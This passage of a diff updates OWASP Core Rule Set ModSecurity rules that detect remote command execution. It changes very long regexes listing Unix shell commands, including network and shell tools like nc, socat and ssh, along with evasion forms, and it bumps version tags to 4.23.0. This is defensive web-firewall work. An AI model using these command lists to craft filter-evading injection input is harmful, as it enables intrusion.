,<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:c|atch)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|p(?:t(?:[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:t[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:datectl|out[\s\x0b&\),<>\|]))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|diff)|(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:c|a(?:ll|tch))[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))" \ "id:932239,\ phase:1,\ block,\ @@ -1663,7 +1741,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\) tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1698,14 +1776,14 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1723,6 +1801,8 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'O # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1748,7 +1828,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'O # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932232 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(